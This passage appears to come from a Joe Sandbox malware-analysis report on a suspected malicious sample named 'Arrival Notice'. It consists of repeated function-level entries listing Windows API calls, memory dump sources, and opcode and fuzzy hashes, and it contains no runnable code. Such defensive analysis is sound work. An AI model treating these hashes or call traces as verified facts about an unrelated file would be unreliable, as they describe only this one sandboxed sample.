                                                • Part of subcall function 008D3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009962F8,009962E0,?,?), ref: 008D3BFD
                                                • Part of subcall function 008D3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 008D3C81
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D49D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
                                              • Instruction ID: 0b4c13151cb48ec47527f15a3c0446e44e2bbaf1cf6d82b53466e6cb364d21f8
                                              • Opcode Fuzzy Hash: 53042549aff3a2d9ac37047317695e162d8a3faf2fd3e1c48f8ab9eae96672c2
                                              • Instruction Fuzzy Hash: 661167719283259BC700EF6DE80591AFFE8FB98710F00461BF095C32B2DB709645DB96
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,008D5981,?,?,?,?), ref: 008D5E27
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,008D5981,?,?,?,?), ref: 0090E19C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: dbc84549fc81392be779bae6b61279dbcf94aaf9500e7c8e02c407421a666e15
                                              • Instruction ID: 5d836ada2f89eb735b0b582ecb48264db61009b38278205436b634ce4be5ce84
                                              • Opcode Fuzzy Hash: dbc84549fc81392be779bae6b61279dbcf94aaf9500e7c8e02c407421a666e15
                                              • Instruction Fuzzy Hash: A201B970244708BEF3241E14CC86F66379CFB01768F108316BAE59A2D0C6B01D458B50
                                              APIs
                                                • Part of subcall function 008F594C: __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                • Part of subcall function 008F594C: __NMSG_WRITE.LIBCMT ref: 008F596A
                                                • Part of subcall function 008F594C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                              • std::exception::exception.LIBCMT ref: 008F102C
                                              • __CxxThrowException@8.LIBCMT ref: 008F1041
                                                • Part of subcall function 008F87DB: RaiseException.KERNEL32(?,?,?,0098BAF8,00000000,?,?,?,?,008F1046,?,0098BAF8,?,00000001), ref: 008F8830
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: bd0331d31de2d091c971f8ac8732bf92f961b90f51f7f53986cda8e7bd0ee3ab
                                              • Instruction ID: f17dee6cb09c5631cc56c86a9667e9efc22fd272c54adccbe2fb37f1ce411f16
                                              • Opcode Fuzzy Hash: bd0331d31de2d091c971f8ac8732bf92f961b90f51f7f53986cda8e7bd0ee3ab
                                              • Instruction Fuzzy Hash: E4F0863550471DE6CB24BB78EC159FE77A8FF40351F100415FA04D5691EFB18A808691
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: c402eb2891d3d6ef3a40d6455ad845942a6fad2aed42894494faad097ee7739e
                                              • Instruction ID: 086eacd7e62c5aa94e11be31e3fdebf5e29d12921cab6af8cf20e7fe3d49fb18
                                              • Opcode Fuzzy Hash: c402eb2891d3d6ef3a40d6455ad845942a6fad2aed42894494faad097ee7739e
                                              • Instruction Fuzzy Hash: 21012571800A0DEBCF11AF7D9C055AF7B61FF807A0F144225BB24DB161DB358A21DB52
                                              APIs
                                                • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                              • __lock_file.LIBCMT ref: 008F561B
                                                • Part of subcall function 008F6E4E: __lock.LIBCMT ref: 008F6E71
                                              • __fclose_nolock.LIBCMT ref: 008F5626
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
                                              • Instruction ID: be5b2b68dfdc3f33d9985655f70bccd93ae7edaa6416f3df4c797a428b5d23ad
                                              • Opcode Fuzzy Hash: 283fd6977afd8f2b5d601dbe6c9ae0e727cfd2a1b2f1e0715889c7f9dc4c4c20
                                              • Instruction Fuzzy Hash: BCF09071900A0CDADB20BF7D880277E67A1FF51734F658209A764EB1C1DF7C89019B56
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 143ae99585cb1405023a964bc6e09b897b36951cb81fa8be4f211c7c60c22d0e
                                              • Instruction ID: 57570c703741d43402759911574f3f93d55350c1322f86feb58c121c9ce00335
                                              • Opcode Fuzzy Hash: 143ae99585cb1405023a964bc6e09b897b36951cb81fa8be4f211c7c60c22d0e
                                              • Instruction Fuzzy Hash: 5D514E35700618AFCF14EF68C991EAE77A9FF85314F148169F956EB392DA30ED008B52
                                              APIs
                                                • Part of subcall function 014C08E0: GetFileAttributesW.KERNELBASE(?), ref: 014C08EB
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 014C119F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 3401506121-0
                                              • Opcode ID: 167712b6dc10c101621f85d1ffa6e81ed773490ba9fcaaeac8f5aea481633851
                                              • Instruction ID: 37e6a5d234e6ba45a3d97bc695c35287c3b896986d26dcc156adc8546d09d7d8
                                              • Opcode Fuzzy Hash: 167712b6dc10c101621f85d1ffa6e81ed773490ba9fcaaeac8f5aea481633851
                                              • Instruction Fuzzy Hash: 5A519635A10209D7EF14EFA4C954BEF733AEF58700F0045ADA609E7290EB799B44CBA5
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 008D5CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 85ca5bffb90f7c9a0e191670142fedda4cf357032f59d14cb17f570c44239756
                                              • Instruction ID: 227c865dc8abcf195d71a8af8e316022d7168475d7c38e59f68d53f3a9e03318
                                              • Opcode Fuzzy Hash: 85ca5bffb90f7c9a0e191670142fedda4cf357032f59d14cb17f570c44239756
                                              • Instruction Fuzzy Hash: 03313971A10B09AFCB18DF2DC484AADB7B6FF48320F14862BE819D3714D771A960DB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 8daaeee1b0ffb6836ae37b1e24e367442a657010052e21a22560cd9e76511527
                                              • Instruction ID: e0075fc5059a4d6eaa9b1fb6484534cbc6a71a32b6a50ab9f7983e88d8af3e77
                                              • Opcode Fuzzy Hash: 8daaeee1b0ffb6836ae37b1e24e367442a657010052e21a22560cd9e76511527
                                              • Instruction Fuzzy Hash: 2D412574608345DFDB24DF18C484B1ABBE0FF85318F19899DE8898B362C772E885CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: eb2710e5cb16ddfd39129744760223e1f4b56c2d8d4f4da250d44081183c863d
                                              • Instruction ID: 50b49aba2f187fea66efea9c511ff05f6c18e25dedafea083bcd49ee7237bcbe
                                              • Opcode Fuzzy Hash: eb2710e5cb16ddfd39129744760223e1f4b56c2d8d4f4da250d44081183c863d
                                              • Instruction Fuzzy Hash: 12111C75204605DFCB24DF28D481A16B7E9FF49354720C96EE98ACB761EB32E841CB50
                                              APIs
                                                • Part of subcall function 008D4D13: FreeLibrary.KERNEL32(00000000,?), ref: 008D4D4D
                                                • Part of subcall function 008F548B: __wfsopen.LIBCMT ref: 008F5496
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F
                                                • Part of subcall function 008D4CC8: FreeLibrary.KERNEL32(00000000), ref: 008D4D02
                                                • Part of subcall function 008D4DD0: _memmove.LIBCMT ref: 008D4E1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
                                              • Instruction ID: a08eff7756b824965d64778023d065f4b246f730dc3c8a31c72c390b6f0f3afe
                                              • Opcode Fuzzy Hash: f4ff276917c3e88e8c98e1920e056c3854d3717c64eac1619895e32ca8b6b07e
                                              • Instruction Fuzzy Hash: 1C11E732650709ABCB20FF79DC12B6E77A9EF40711F10852AF541E63C1DEB19A059B92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: 5f0e1ceae91aeca820da1d5867614161225a378c67bb1e33fd9a6983cb7dedf2
                                              • Instruction ID: 8e7d18061a56adcc3ca9856fd7c1caba7c0a717b4b91875e59b46bf7adbca41b
                                              • Opcode Fuzzy Hash: 5f0e1ceae91aeca820da1d5867614161225a378c67bb1e33fd9a6983cb7dedf2
                                              • Instruction Fuzzy Hash: B82124B4608345DFCB28DF24C444A1ABBE0FF88714F158A69E98A87761D771E885CB53
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,008D5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 008D5D76
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 34e5eac6134ef8ae20b37bbc226e67131d3c1285ae637087ebdf8a33861faff0
                                              • Instruction ID: b3d52172fe7686ef59b8e43772f6e7102e7d3602a47f56b2de328371f18a6013
                                              • Opcode Fuzzy Hash: 34e5eac6134ef8ae20b37bbc226e67131d3c1285ae637087ebdf8a33861faff0
                                              • Instruction Fuzzy Hash: CD11F831204B059FE3208F15C484B66B7E6FB45764F148A2FE5AAC6A50D771E945CB60
                                              APIs
                                              • __lock_file.LIBCMT ref: 008F4AD6
                                                • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __getptd_noexit__lock_file
                                              • String ID:
                                              • API String ID: 2597487223-0
                                              • Opcode ID: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
                                              • Instruction ID: 973550aaf5bb9fc1e293d5f5e1b0aa4f7156bd555fe9d36936fcfa55bdf689c4
                                              • Opcode Fuzzy Hash: 351cee4260270f6338280a70cb88a8a6ee4f30eefa5038d83a1715a3e0632510
                                              • Instruction Fuzzy Hash: B1F08131A4021DDBDF51AF788C063BF3665FF00325F144515B624EA1D1DB788961DB52
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4FDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
                                              • Instruction ID: bf51add0f31b8c99e408a61c20a2c2e96e89ba395975355b0b7093fabbf13274
                                              • Opcode Fuzzy Hash: 4b63cdae1eb40ee5132f4d1de347fb9c58d59d9fa6fdf05a03745365832ceedd
                                              • Instruction Fuzzy Hash: 02F01571509B16CFCB349F64E494822BBE1FF043293209A3EE2D6C2720CB32A844DB41
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4
                                                • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
                                              • Instruction ID: 0318b5649dc554f4329fa6a7d7c441ee7959512091eca3f78adbbc412a3b35da
                                              • Opcode Fuzzy Hash: 663271987e24e81dbfb9cab845d066cdd291f6d39291b5f98a5e5473fb6c4025
                                              • Instruction Fuzzy Hash: 49E086769442285BC720E6589C05FFA77EDDF887A1F0401B6FC0CD7248E9649C818691
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction ID: 17620665e2a5fec3c0dc0d049dc559d5c66b32a9b895098fb025d73b2dd622b0
                                              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                              • Instruction Fuzzy Hash: DBE092B0118B005FD7348A24D8507E373E4FB06315F00081CF29AD3341EBA278418B59
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 014C08EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction ID: f9eb4952eee5ac742b1cd1f129e8fb6048587c3a6b386f1ef18e7e5ff3965641
                                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                              • Instruction Fuzzy Hash: 58E08C79A0520CEBEBA0CBBC8808BEA77A8DB08720F00865AF91AC3290D5308A419754
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0090E16B,?,?,00000000), ref: 008D5DBF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 676833b75e8f31f163c489cc65de0a9a18e2bedb7bef7a36dafc58d72d9616d1
                                              • Instruction ID: 6d029c92c3c850cbe6350de71a710d46f45d7e2c458e8633bb1d6493a4ed5ee3
                                              • Opcode Fuzzy Hash: 676833b75e8f31f163c489cc65de0a9a18e2bedb7bef7a36dafc58d72d9616d1
                                              • Instruction Fuzzy Hash: 8CD0C77465430CBFE710DB81DC46FAA777CD705721F100194FD0497690D6B27D509795
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?), ref: 014C08BB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction ID: 444ecb4afddfa3481016691fc5002bc086c1a5efa5fb5a8c72a8b2b76fb31938
                                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                              • Instruction Fuzzy Hash: A6D0A73490620CEBCB50CFB89C04ADB73A8DB04720F008759FD15D3281D63199449BA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
